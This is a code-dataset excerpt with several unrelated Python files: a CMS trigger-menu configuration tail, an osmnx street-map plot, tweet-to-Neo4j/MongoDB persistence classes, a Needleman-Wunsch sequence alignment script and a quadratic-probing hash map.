cms.Sequence( HLTMuonLocalRecoSequence + hltL2MuonSeeds + hltL2Muons )\nHLTL2muonrecoSequence = cms.Sequence( HLTL2muonrecoNocandSequence + hltL2MuonCandidates )\nHLTDoLocalPixelSequence = cms.Sequence( hltSiPixelDigis + hltSiPixelClusters + hltSiPixelRecHits )\nHLTDoLocalStripSequence = cms.Sequence( hltSiStripExcludedFEDListProducer + hltSiStripRawToClustersFacility + hltSiStripClusters )\nHLTL3muonTkCandidateSequence = cms.Sequence( HLTDoLocalPixelSequence + HLTDoLocalStripSequence + hltL3TrajSeedOIState + hltL3TrackCandidateFromL2OIState + hltL3TkTracksFromL2OIState + hltL3MuonsOIState + hltL3TrajSeedOIHit + hltL3TrackCandidateFromL2OIHit + hltL3TkTracksFromL2OIHit + hltL3MuonsOIHit + hltL3TkFromL2OICombination + hltL3TrajSeedIOHit + hltL3TrackCandidateFromL2IOHit + hltL3TkTracksFromL2IOHit + hltL3MuonsIOHit + hltL3TrajectorySeed + 
hltL3TrackCandidateFromL2 )\nHLTL3muonrecoNocandSequence = cms.Sequence( HLTL3muonTkCandidateSequence + hltL3TkTracksFromL2 + hltL3MuonsLinksCombination + hltL3Muons )\nHLTL3muonrecoSequence = cms.Sequence( HLTL3muonrecoNocandSequence + hltL3MuonCandidates )\nHLTEndSequence = cms.Sequence( hltBoolEnd )\nHLTDoLocalHcalSequence = cms.Sequence( hltHcalDigis + hltHbhereco + hltHfreco + hltHoreco )\nHLTL2muonisorecoSequence = cms.Sequence( hltEcalRawToRecHitFacility + hltEcalRegionalMuonsFEDs + hltEcalRegionalMuonsRecHit + HLTDoLocalHcalSequence + hltTowerMakerForMuons + hltL2MuonIsolations )\nHLTL3muonisorecoSequence = cms.Sequence( hltPixelTracks + hltL3MuonIsolations )\nHLTMuTrackJpsiPixelRecoSequence = cms.Sequence( HLTDoLocalPixelSequence + hltPixelTracks + hltMuTrackJpsiPixelTrackSelector + hltMuTrackJpsiPixelTrackCands )\nHLTMuTrackJpsiTrackRecoSequence = cms.Sequence( HLTDoLocalStripSequence + hltMuTrackJpsiTrackSeeds + hltMuTrackJpsiCkfTrackCandidates + hltMuTrackJpsiCtfTracks + hltMuTrackJpsiCtfTrackCands )\n\nHLT_DoubleMu4_Jpsi_Displaced_v1 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreDoubleMu4JpsiDisplaced + hltDimuonL1Filtered0 + HLTL2muonrecoSequence + hltDimuonL2PreFiltered0 + HLTL3muonrecoSequence + hltDoubleMu4JpsiDisplacedL3Filtered + hltDisplacedmumuVtxProducerDoubleMu4Jpsi + hltDisplacedmumuFilterDoubleMu4Jpsi + HLTEndSequence )\nHLT_DoubleMu5_Jpsi_Displaced_v1 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreDoubleMu5JpsiDisplaced + hltDimuonL1Filtered0 + HLTL2muonrecoSequence + hltDimuonL2PreFiltered0 + HLTL3muonrecoSequence + hltDoubleMu5JpsiDisplacedL3Filtered + hltDisplacedmumuVtxProducerDoubleMu5Jpsi + hltDisplacedmumuFilterDoubleMu5Jpsi + HLTEndSequence )\nHLT_DoubleMu5_Jpsi_Displaced_v2 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreDoubleMu5JpsiDisplaced + hltDimuonL1Filtered0 + HLTL2muonrecoSequence + hltDimuonL2PreFiltered0 + HLTL3muonrecoSequence + hltDoubleMu5JpsiDisplacedL3Filtered + hltDisplacedmumuVtxProducerDoubleMu5Jpsi + hltDisplacedmumuFilterDoubleMu5Jpsi + HLTEndSequence )\nHLT_DoubleMu4_Dimuon4_Bs_Barrel_v1 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreDoubleMu4Dimuon4BsBarrel + hltDimuonL1Filtered0 + HLTL2muonrecoSequence + hltDimuonL2PreFiltered0 + HLTL3muonrecoSequence + hltDoubleMu4BarrelBsL3Filtered + hltDisplacedmumuVtxProducerBs4 + hltVertexmumuFilterBs4 + HLTEndSequence )\nHLT_DoubleMu4_Dimuon6_Bs_v1 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreDoubleMu4Dimuon6Bs + hltDimuonL1Filtered0 + HLTL2muonrecoSequence + hltDimuonL2PreFiltered0 + HLTL3muonrecoSequence + hltDoubleMu4Dimuon6BsL3Filtered + hltDisplacedmumuVtxProducerBs6 + hltVertexmumuFilterBs6 + HLTEndSequence )\nHLT_DoubleMu4p5_LowMass_Displaced_v1 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreDoubleMu4p5LowMassDisplaced + hltDimuonL1Filtered0 + HLTL2muonrecoSequence + hltDimuonL2PreFiltered0 + HLTL3muonrecoSequence + hltDoubleMu4p5LowMassDisplacedL3Filtered + hltDisplacedmumuVtxProducerDoubleMu4p5LowMass + hltDisplacedmumuFilterDoubleMu4p5LowMass + HLTEndSequence )\nHLT_DoubleMu5_LowMass_Displaced_v1 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreDoubleMu5LowMassDisplaced + hltDimuonL1Filtered0 + HLTL2muonrecoSequence + hltDimuonL2PreFiltered0 + HLTL3muonrecoSequence + hltDoubleMu5LowMassDisplacedL3Filtered + hltDisplacedmumuVtxProducerDoubleMu5LowMass + hltDisplacedmumuFilterDoubleMu5LowMass + HLTEndSequence )\nHLT_Dimuon0_Jpsi_v6 = cms.Path( HLTBeginSequence + 
hltL1sL1DoubleMu0HighQ + hltPreDimuon0Jpsi + hltDimuonL1Filtered0 + HLTL2muonrecoSequence + hltDimuonL2PreFiltered0 + HLTL3muonrecoSequence + hltJpsiL3Filtered + hltDisplacedmumuVtxProducerJpsi0 + hltVertexmumuFilterJpsi + HLTEndSequence )\nHLT_Dimuon0_Jpsi_NoVertexing_v3 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreDimuon0JpsiNoVertexing + hltDimuonL1Filtered0 + HLTL2muonrecoSequence + hltDimuonL2PreFiltered0 + HLTL3muonrecoSequence + hltJpsiNoVertexingL3Filtered + HLTEndSequence )\nHLT_Dimuon0_Upsilon_v6 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreDimuon0Upsilon + hltDimuonL1Filtered0 + HLTL2muonrecoSequence + hltDimuonL2PreFiltered0 + HLTL3muonrecoSequence + hltUpsilonL3Filtered + hltDisplacedmumuVtxProducerUpsilon + hltVertexmumuFilterUpsilon + HLTEndSequence )\nHLT_Dimuon6_LowMass_v1 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu3 + hltPreDimuon6LowMass + hltL1DiMuon6L1Filtered0 + HLTL2muonrecoSequence + hltL2DiMuon6L2PreFiltered0 + HLTL2muonisorecoSequence + hltDiMuon6IsoMuL2Filtered0 + HLTL3muonrecoSequence + hltDiMuon6LowMassFiltered6 + HLTL3muonisorecoSequence + hltDiMuon6IsoMuL3Filtered6 + hltDisplacedmumuVtxProducerDiMuon6LowMass + hltVertexmumuFilterDiMuon6LowMass + HLTEndSequence )\nHLT_Dimuon7_Upsilon_Barrel_v1 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreDimuon7UpsilonBarrel + hltDimuonL1Filtered0 + HLTL2muonrecoSequence + hltDimuonL2PreFiltered0 + HLTL3muonrecoSequence + hltBarrelDimuon7UpsilonL3Filtered + hltDisplacedmumuVtxProducerDimuon7UpsilonBarrel + hltVertexmumuFilterDimuon7UpsilonBarrel + HLTEndSequence )\nHLT_Dimuon9_Upsilon_Barrel_v1 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreDimuon9UpsilonBarrel + hltDimuonL1Filtered0 + HLTL2muonrecoSequence + hltDimuonL2PreFiltered0 + HLTL3muonrecoSequence + hltDimuon9BarrelUpsilonL3Filtered + hltDisplacedmumuVtxProducerDimuon9UpsilonBarrel + hltVertexmumuFilterDimuon9UpsilonBarrel + HLTEndSequence )\nHLT_Dimuon9_PsiPrime_v1 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreDimuon9PsiPrime + hltDimuonL1Filtered0 + HLTL2muonrecoSequence + hltDimuonL2PreFiltered0 + HLTL3muonrecoSequence + hltDimuon9PsiPrimeL3Filtered + hltDisplacedmumuVtxProducerDimuon9PsiPrime + hltVertexmumuFilterDimuon9PsiPrime + HLTEndSequence )\nHLT_Dimuon10_Jpsi_Barrel_v6 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreDimuon10JpsiBarrel + hltDimuonL1Filtered0 + HLTL2muonrecoSequence + hltDimuonL2PreFiltered0 + HLTL3muonrecoSequence + hltDimuon10BarrelJpsiL3Filtered + hltDisplacedmumuVtxProducerDimuon10JpsiBarrel + hltVertexmumuFilterDimuon10JpsiBarrel + HLTEndSequence )\nHLT_Dimuon11_PsiPrime_v1 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreDimuon11PsiPrime + hltDimuonL1Filtered0 + HLTL2muonrecoSequence + hltDimuonL2PreFiltered0 + HLTL3muonrecoSequence + hltDimuon11PsiPrimeL3Filtered + hltDisplacedmumuVtxProducerDimuon11PsiPrime + hltVertexmumuFilterDimuon11PsiPrime + HLTEndSequence )\nHLT_Dimuon13_Jpsi_Barrel_v1 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreDimuon13JpsiBarrel + hltDimuonL1Filtered0 + HLTL2muonrecoSequence + hltDimuonL2PreFiltered0 + HLTL3muonrecoSequence + hltDimuon13BarrelJpsiL3Filtered + hltDisplacedmumuVtxProducerDimuon13JpsiBarrel + hltVertexmumuFilterDimuon13JpsiBarrel + HLTEndSequence )\nHLT_Dimuon0_Jpsi_Muon_v7 = cms.Path( HLTBeginSequence + hltL1sL1TripleMu0 + hltPreDimuon0JpsiMuon + hltTripleMuonL1Filtered0 + HLTL2muonrecoSequence + hltTripleMuonL2PreFiltered0 + HLTL3muonrecoSequence + 
hltTripleMuL3PreFiltered0 + hltJpsiMuonL3Filtered + hltDisplacedmumuVtxProducerJpsiMuon + hltVertexmumuFilterJpsiMuon + HLTEndSequence )\nHLT_Dimuon0_Upsilon_Muon_v7 = cms.Path( HLTBeginSequence + hltL1sL1TripleMu0 + hltPreDimuon0UpsilonMuon + hltTripleMuonL1Filtered0 + HLTL2muonrecoSequence + hltTripleMuonL2PreFiltered0 + HLTL3muonrecoSequence + hltTripleMuL3PreFiltered0 + hltUpsilonMuonL3Filtered + hltDisplacedmumuVtxProducerUpsilonMuon + hltVertexmumuFilterUpsilonMuon + HLTEndSequence )\nHLT_Mu5_L2Mu2_Jpsi_v9 = cms.Path( HLTBeginSequence + hltL1sL1DoubleMu0HighQ + hltPreMu5L2Mu2Jpsi + hltMu5L2Mu2L1Filtered0 + HLTL2muonrecoSequence + hltMu5L2Mu2L2PreFiltered0 + HLTL3muonrecoSequence + hltMu5L2Mu2L3Filtered5 + hltMu5L2Mu2JpsiTrackMassFiltered + HLTEndSequence )\nHLT_Mu5_Track2_Jpsi_v9 = cms.Path( HLTBeginSequence + hltL1sL1SingleMu3 + hltPreMu5Track2Jpsi + hltMu5TrackJpsiL1Filtered0 + HLTL2muonrecoSequence + hltMu5TrackJpsiL2Filtered3 + HLTL3muonrecoSequence + hltMu5TrackJpsiL3Filtered3 + HLTMuTrackJpsiPixelRecoSequence + hltMu5Track1JpsiPixelMassFiltered + HLTMuTrackJpsiTrackRecoSequence + hltMu5Track2JpsiTrackMassFiltered + HLTEndSequence )\nHLT_Mu7_Track7_Jpsi_v10 = cms.Path( HLTBeginSequence + hltL1sL1SingleMu7 + hltPreMu7Track7Jpsi + hltMu7TrackJpsiL1Filtered0 + HLTL2muonrecoSequence + hltMu7TrackJpsiL2Filtered3 + HLTL3muonrecoSequence + hltMu7TrackJpsiL3Filtered3 + HLTMuTrackJpsiPixelRecoSequence + hltMu7Track6JpsiPixelMassFiltered + HLTMuTrackJpsiTrackRecoSequence + hltMu7Track7JpsiTrackMassFiltered + HLTEndSequence )\nHLTriggerFinalPath = cms.Path( hltGtDigis + hltScalersRawToDigi + hltFEDSelector + hltTriggerSummaryAOD + hltTriggerSummaryRAW )\n\n\nHLTSchedule = cms.Schedule( *(HLT_DoubleMu4_Jpsi_Displaced_v1, HLT_DoubleMu5_Jpsi_Displaced_v1, HLT_DoubleMu5_Jpsi_Displaced_v2, HLT_DoubleMu4_Dimuon4_Bs_Barrel_v1, HLT_DoubleMu4_Dimuon6_Bs_v1, HLT_DoubleMu4p5_LowMass_Displaced_v1, HLT_DoubleMu5_LowMass_Displaced_v1, HLT_Dimuon0_Jpsi_v6, HLT_Dimuon0_Jpsi_NoVertexing_v3, HLT_Dimuon0_Upsilon_v6, HLT_Dimuon6_LowMass_v1, HLT_Dimuon7_Upsilon_Barrel_v1, HLT_Dimuon9_Upsilon_Barrel_v1, HLT_Dimuon9_PsiPrime_v1, HLT_Dimuon10_Jpsi_Barrel_v6, HLT_Dimuon11_PsiPrime_v1, HLT_Dimuon13_Jpsi_Barrel_v1, HLT_Dimuon0_Jpsi_Muon_v7, HLT_Dimuon0_Upsilon_Muon_v7, HLT_Mu5_L2Mu2_Jpsi_v9, HLT_Mu5_Track2_Jpsi_v9, HLT_Mu7_Track7_Jpsi_v10, HLTriggerFinalPath ))\n\n# remove the HLT prescales\nif 'PrescaleService' in locals():\n PrescaleService.lvl1DefaultLabel = cms.untracked.string( '0' )\n PrescaleService.lvl1Labels = cms.vstring( '0', '1', '2', '3', '4', '5', '6', '7', '8', '9' )\n PrescaleService.prescaleTable = cms.VPSet( )\n\n# En-able HF Noise filters in GRun menu\nif 'hltHfreco' in locals():\n hltHfreco.setNoiseFlags = cms.bool( True )\n\n# version specific customizations\nimport os\ncmsswVersion = os.environ['CMSSW_VERSION']\n\n# from CMSSW_4_4_0 / CMSSW_5_0_0_pre1: change input label for V00-04-17-00 RecoVertex/BeamSpotProducer\nif cmsswVersion > \"CMSSW_4_4\":\n if 'hltOnlineBeamSpot' in locals():\n hltOnlineBeamSpot.src = hltOnlineBeamSpot.label\n del hltOnlineBeamSpot.label\n\n# from CMSSW_4_4_0_pre8: update HF configuration for V00-09-18 RecoLocalCalo/HcalRecProducers\nif cmsswVersion > \"CMSSW_4_4\":\n if 'hltHfreco' in locals():\n hltHfreco.digiTimeFromDB = cms.bool( False )\n hltHfreco.digistat.HFdigiflagCoef = cms.vdouble(\n hltHfreco.digistat.HFdigiflagCoef0.value(),\n hltHfreco.digistat.HFdigiflagCoef1.value(),\n hltHfreco.digistat.HFdigiflagCoef2.value()\n )\n del 
hltHfreco.digistat.HFdigiflagCoef0\n del hltHfreco.digistat.HFdigiflagCoef1\n del hltHfreco.digistat.HFdigiflagCoef2\n\n# from CMSSW_4_4_0_pre6: updated configuration for the HybridClusterProducer's and EgammaHLTHybridClusterProducer's\nif cmsswVersion > \"CMSSW_4_4\":\n if 'hltHybridSuperClustersActivity' in locals():\n hltHybridSuperClustersActivity.xi = cms.double( 0.0 )\n hltHybridSuperClustersActivity.useEtForXi = cms.bool( False )\n if 'hltHybridSuperClustersL1Isolated' in locals():\n hltHybridSuperClustersL1Isolated.xi = cms.double( 0.0 )\n hltHybridSuperClustersL1Isolated.useEtForXi = cms.bool( False )\n if 'hltHybridSuperClustersL1NonIsolated' in locals():\n hltHybridSuperClustersL1NonIsolated.xi = cms.double( 0.0 )\n hltHybridSuperClustersL1NonIsolated.useEtForXi = cms.bool( False )\n\n# from CMSSW_4_4_0_pre5: updated configuration for the PFRecoTauDiscriminationByIsolation producers\nif cmsswVersion > \"CMSSW_4_4\":\n if 'hltPFTauTightIsoIsolationDiscriminator' in locals():\n hltPFTauTightIsoIsolationDiscriminator.qualityCuts.primaryVertexSrc = hltPFTauTightIsoIsolationDiscriminator.PVProducer\n hltPFTauTightIsoIsolationDiscriminator.qualityCuts.pvFindingAlgo = cms.string('highestPtInEvent')\n del hltPFTauTightIsoIsolationDiscriminator.PVProducer\n if 'hltPFTauLooseIsolationDiscriminator' in locals():\n hltPFTauLooseIsolationDiscriminator.qualityCuts.primaryVertexSrc = hltPFTauLooseIsolationDiscriminator.PVProducer\n hltPFTauLooseIsolationDiscriminator.qualityCuts.pvFindingAlgo = cms.string('highestPtInEvent')\n del hltPFTauLooseIsolationDiscriminator.PVProducer\n\n# from CMSSW_4_4_0_pre5: updated configuration for the EcalSeverityLevelESProducer\nif cmsswVersion > \"CMSSW_4_4\":\n ecalSeverityLevel = cms.ESProducer(\"EcalSeverityLevelESProducer\",\n appendToDataLabel = cms.string(''),\n dbstatusMask=cms.PSet(\n kGood = cms.vuint32(0),\n kProblematic = cms.vuint32(1, 2, 3, 4, 5, 6, 7, 8, 9, 10),\n kRecovered = cms.vuint32(),\n kTime = cms.vuint32(),\n kWeird = cms.vuint32(),\n kBad = cms.vuint32(11, 12, 13, 14, 15, 16)\n ),\n flagMask = cms.PSet (\n kGood = cms.vstring('kGood'),\n kProblematic = cms.vstring('kPoorReco', 'kPoorCalib', 'kNoisy', 'kSaturated'),\n kRecovered = cms.vstring('kLeadingEdgeRecovered', 'kTowerRecovered'),\n kTime = cms.vstring('kOutOfTime'),\n kWeird = cms.vstring('kWeird', 'kDiWeird'),\n kBad = cms.vstring('kFaultyHardware', 'kDead', 'kKilled')\n ),\n timeThresh = cms.double(2.0)\n )\n\n# from CMSSW_4_3_0_pre6: ECAL severity flags migration\nif cmsswVersion > \"CMSSW_4_3\":\n import HLTrigger.Configuration.Tools.updateEcalSeverityFlags\n HLTrigger.Configuration.Tools.updateEcalSeverityFlags.update( locals() )\n\n","sub_path":"python/HLT_3e33_cff.py","file_name":"HLT_3e33_cff.py","file_ext":"py","file_size_in_byte":220413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"399112134","text":"import matplotlib.pyplot as plt\nimport osmnx as ox\nfrom descartes import PolygonPatch\nfrom shapely.geometry import Polygon, MultiPolygon\nox.config(log_console=True, use_cache=True)\nox.__version__\n\n\n\n\n# get the place shape\n#gdf = ox.gdf_from_place('Portland, Maine')\ngdf = ox.project_gdf(gdf)\n\n# get the street network, with retain_all=True to retain all the disconnected islands' networks\nG = ox.graph_from_place('Portland, Maine', network_type='drive', retain_all=True)\nG = ox.project_graph(G)\n\nfig, ax = ox.plot_graph(G, fig_height=10, show=False, close=False, edge_color='#777777')\nplt.show()\n\nplt.close()\n\n\n\n# to this matplotlib axis, add the place shape as descartes polygon patches\nfor geometry in gdf['geometry'].tolist():\n if isinstance(geometry, (Polygon, MultiPolygon)):\n if isinstance(geometry, Polygon):\n geometry = MultiPolygon([geometry])\n for polygon in geometry:\n patch = PolygonPatch(polygon, fc='#cccccc', ec='k', linewidth=3, alpha=0.1, zorder=-1)\n ax.add_patch(patch)\n\n\n# optionally set up the axes extents all nicely\nmargin = 0.02\nwest, south, east, north = gdf.unary_union.bounds\nmargin_ns = (north - south) * margin\nmargin_ew = (east - west) * margin\nax.set_ylim((south - margin_ns, north + margin_ns))\nax.set_xlim((west - margin_ew, east + margin_ew))\nplt.show()\n\nprint('hi')","sub_path":"jon_insight_project/models/predict_model.py","file_name":"predict_model.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"294363422","text":"from py2neo import Relationship\n\nfrom settings import *\n\n\nclass TwitterUser(dict):\n\n def persist_twitter_user(self, database_name):\n if (database_name == 'mongo'):\n db_tweet.users.replace_one({'id': self['id']}, self, upsert=True)\n elif (database_name == 'neo'):\n user = graph.merge_one(\"Twitter_User\", \"id\", self['id'])\n for key in self:\n user[key] = self[key]\n user.push()\n tweet_node = graph.find_one(\"Tweet\", \"id\", self['tweet_id'])\n\n user_tweeted = Relationship(user, \"TWEETED\", tweet_node)\n graph.create_unique(user_tweeted)\n\n\n\n\nclass Tweet(dict):\n def persist_tweet(self, database_name, tweet_type):\n if (database_name == 'mongo'):\n db_tweet.tweets.replace_one({'id': self['id']}, self, upsert=True)\n elif (database_name == 'neo'):\n tweet_node = graph.merge_one(\"Tweet\", \"id\", self['id'])\n for key in self:\n tweet_node[key] = self[key]\n tweet_node.push()\n\n if tweet_type == 'search':\n tweets_node = graph.find_one(\"Search\", \"name\", \"SEARCH\")\n tweets_has_search_tweet = Relationship(tweets_node, \"HAS\", tweet_node)\n graph.create_unique(tweets_has_search_tweet)\n elif tweet_type == 'stream':\n tweets_node = graph.find_one(\"Stream\", \"name\", \"STREAM\")\n tweets_has_stream_tweet = Relationship(tweets_node, \"HAS\", tweet_node)\n graph.create_unique(tweets_has_stream_tweet)\n\n photos_node = graph.merge_one(\"Photos\", \"tweet_id\", self['id'])\n photos_node['name'] = \"Photos\"\n photos_node.push()\n tweet_has_photos = Relationship(tweet_node, \"HAS\", photos_node)\n graph.create_unique(tweet_has_photos)\n\n\n urls_node = graph.merge_one(\"Urls\", \"tweet_id\", self['id'])\n urls_node['name'] = \"Urls\"\n urls_node.push()\n tweet_has_urls = Relationship(tweet_node, \"HAS\", urls_node)\n graph.create_unique(tweet_has_urls)\n\n\n\n hashtags_node = graph.merge_one(\"Hashtags\", \"tweet_id\", self['id'])\n hashtags_node['name'] = \"Hashtags\"\n hashtags_node.push()\n tweet_has_hashtags = Relationship(tweet_node, \"HAS\", hashtags_node)\n graph.create_unique(tweet_has_hashtags)\n\n\n user_mentions_node = graph.merge_one(\"User_mentions\", \"tweet_id\", self['id'])\n\n user_mentions_node['name'] = \"User_mentions\"\n user_mentions_node.push()\n tweet_has_user_mentions = Relationship(tweet_node, \"HAS\", user_mentions_node)\n graph.create_unique(tweet_has_user_mentions)\n\n\n\nclass Photo(dict):\n\n def persist_photo(self):\n photo = graph.merge_one(\"Photo\", \"tweet_id\", self['tweet_id'])\n for key in self:\n photo[key] = self[key]\n photo.push()\n\n photos_node = graph.find_one(\"Photos\", \"tweet_id\", self['tweet_id'])\n photos_has_photo = Relationship(photos_node, \"HAS\", photo)\n graph.create_unique(photos_has_photo)\n\n\nclass Url(dict):\n def persist_Url(self):\n url = graph.merge_one(\"Url\", \"tweet_id\", self['tweet_id'])\n for key in self:\n url[key] = self[key]\n url.push()\n\n urls_node = graph.find_one(\"Urls\", \"tweet_id\", self['tweet_id'])\n urls_has_url = Relationship(urls_node, \"HAS\", url)\n graph.create_unique(urls_has_url)\n\n\n\nclass Hashtag(dict):\n def persist_Hashtag(self):\n ht = graph.merge_one(\"Hashtag\", \"tweet_id\", self['tweet_id'])\n for key in self:\n ht[key] = self[key]\n ht.push()\n\n hashtags_node = graph.find_one(\"Hashtags\", \"tweet_id\", self['tweet_id'])\n hashtags_has_hashtag = Relationship(hashtags_node, \"HAS\", ht)\n graph.create_unique(hashtags_has_hashtag)\n\nclass UserMention(dict):\n def persist_UserMention(self):\n um = graph.merge_one(\"UserMention\", 
\"tweet_id\", self['tweet_id'])\n for key in self:\n um[key] = self[key]\n um.push()\n\n\n user_mentions_node = graph.find_one(\"User_mentions\", \"tweet_id\", self['tweet_id'])\n\n user_mentions_has_user_mention = Relationship(user_mentions_node, \"HAS\", um)\n graph.create_unique(user_mentions_has_user_mention)","sub_path":"SN-Extractor/Twitter/twitter_entities.py","file_name":"twitter_entities.py","file_ext":"py","file_size_in_byte":4349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"188394814","text":"#Solution is based off of the Needleman-Wunsch Algorithm. https://en.wikipedia.org/wiki/Needleman%E2%80%93Wunsch_algorithm\n\n#Imports\nfrom sys import argv;\n\n#read in the data from a file\nfilename = argv[1];\ninfile = open(filename, 'r');\ndataset = infile.readlines();\ninfile.close();\n\nstr1 = dataset[0].rstrip(\"\\n\");\nstr2 = dataset[1].rstrip(\"\\n\");\n\n#Create a 2-dimensional array. Need to do len + 1 because of how python does in range\ngrid = [[None for i in range(len(str1) + 1)] for j in range(len(str2) + 1)];\n\n#Create a dictionary of scores\nscores = {\n\t\"TT\": 20,\n\t\"TC\": 10,\n\t\"TA\": 5,\n\t\"TG\": 5,\n\t\"T-\": -5,\n\n\t\"CT\": 10,\n\t\"CC\": 20,\n\t\"CA\": 5,\n\t\"CG\": 5,\n\t\"C-\": -5,\n\n\t\"AT\": 5,\n\t\"AC\": 5,\n\t\"AA\": 20,\n\t\"AG\": 10,\n\t\"A-\": -5,\n\n\t\"GT\": 5,\n\t\"GC\": 5,\n\t\"GA\": 10,\n\t\"GG\": 20,\n\t\"G-\": -5,\n\n\t\"-T\": -5,\n\t\"-C\": -5,\n\t\"-A\": -5,\n\t\"-G\": -5\n};\n\n#Function to trace the paths\ndef tracePaths(i, j, seq1, seq2, gridVal):\n\t#Get what the scored would have been\n\tdiagonal = grid[j - 1][i - 1] + scores[str2[j - 1] + str1[i - 1]];\n\tbehind = grid[j][i - 1] + scores[str2[j - 1] + \"-\"];\n\tabove = grid[j - 1][i] + scores[\"-\" + str1[i - 1]];\n\n\t#Top corner was hit\n\tif(i == 0 and j == 0):\n\t\tprint(seq1);\n\t\tprint(seq2);\n\t\treturn;\n\n\t#At the left most col \n\tif(i == 0):\n\t\twhile(j != 0):\t\t\t\n\t\t\tseq1 = \"-{0}\".format(seq1);\n\t\t\tseq2 = \"{0}{1}\".format(str2[j - 1], seq2);\n\t\t\tj -= 1;\n\t\tprint(\"-{0}\".format(seq1));\n\t\tprint(seq2);\n\t\treturn;\t\t\n\n\t#At the top row\n\tif(j == 0):\n\t\twhile(i != 0):\n\t\t\tseq1 = \"{0}{1}\".format(str1[i - 1], seq1);\n\t\t\tseq2 = \"-{0}\".format(str2);\t\t\n\t\t\ti -= 1;\n\t\tprint(seq1);\n\t\tprint(\"-{0}\".format(seq2));\n\t\treturn;\n\n\t#Trace diagonally\n\tif(gridVal == diagonal):\t\t\n\t\ttracePaths(i - 1, j - 1, \"{0}{1}\".format(str1[i - 1], seq1), \"{0}{1}\".format(str2[j - 1], seq2), grid[j - 1][i - 1]);\n\n\t#Trace left\n\tif(gridVal == behind):\n\t\ttracePaths(i, j - 1, \"-{0}\".format(seq1), \"{0}{1}\".format(str2[j - 1], seq2), grid[j][i - 1]);\n\n\t#trace up\n\tif(gridVal == above):\n\t\ttracePaths(i - 1, j, \"{0}{1}\".format(str1[i - 1], seq1), \"-{0}\".format(seq2), grid[j - 1][i]);\n#End function definition\n\n#Set the gap value\ngapVal = -5;\n\n#Set the first row\nfor i in range(len(str1) + 1):\n\tgrid[0][i] = i * gapVal;\n\n#Set the first column\nfor j in range(0, len(str2) + 1):\n\tgrid[j][0] = j * gapVal;\n\n#Fill in the grid\nfor i in range(1, len(str2) + 1):\n\tfor j in range(1, len(str1) + 1):\n\t\tdiagonal = grid[i - 1][j - 1] + scores[str2[i - 1] + str1[j - 1]];\n\t\tbehind = grid[i][j - 1] + scores[str2[i - 1] + \"-\"];\n\t\tabove = grid[i - 1][j] + scores[\"-\" + str1[j - 1]];\t\t\n\t\tgrid[i][j] = max(diagonal, above, behind);\n\n#Call the function to trace the paths\ntracePaths(len(str1), len(str2), \"\", \"\", grid[len(str2)][len(str1)]);","sub_path":"p2/alignment.py","file_name":"alignment.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"183229636","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 15 20:18:04 2018\n\n@author: yahia\n\"\"\"\n \nfrom Node import Node\n \nclass Hash_map_Quadratic_Probing(object):\n def __init__(self,slots = 13):\n self.array = [Node(None)] * slots\n self.numberofelements = 0\n self.length = slots\n \n def Hash_Function(self,number,i):\n return ((number + 3 + 5*i + 7*(i**2)) % self.length)\n \n def insert(self,number):\n self.numberofelements+=1\n i = 0\n key = self.Hash_Function(number,i)\n NewNumb = Node(number)\n NewNumb.key = key\n while(self.array[key].data is not None and not self.array[key].dead):\n if(self.array[key].key != NewNumb.key):\n raise NameError('Table is Full')\n i+=1\n key = self.Hash_Function(number,i)\n self.array[key] = NewNumb\n \n def Delete(self,Number):\n i = 0\n key = self.Hash_Function(Number,i)\n nodeatkey = self.array[key]\n while(nodeatkey.data != Number and i != self.length):\n i+=1\n key = self.Hash_Function(Number,i)\n nodeatkey = self.array[key]\n if i == self.length:\n raise NameError('Value isnt in table')\n if(self.array[key].dead):\n raise NameError('Value is already dead')\n\n self.array[key].dead = True\n\n \n def printHashMap(self):\n for index in range(self.length):\n print(\"Slot #\" + str(index) + \" : \", end=\"\")\n print(self.array[index].data)\n \n \nmyhashmap = Hash_map_Quadratic_Probing()\nmyhashmap.insert(2243)\nmyhashmap.insert(2343)\nmyhashmap.insert(2343)\nmyhashmap.insert(2343)\n\n\n\n\n\nmyhashmap.printHashMap()\n\n\n\n\n\n \n ","sub_path":"Data_Structures/Quadratic_Probing_Hashmap/Quadratic_Probing_Hashmap.py","file_name":"Quadratic_Probing_Hashmap.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
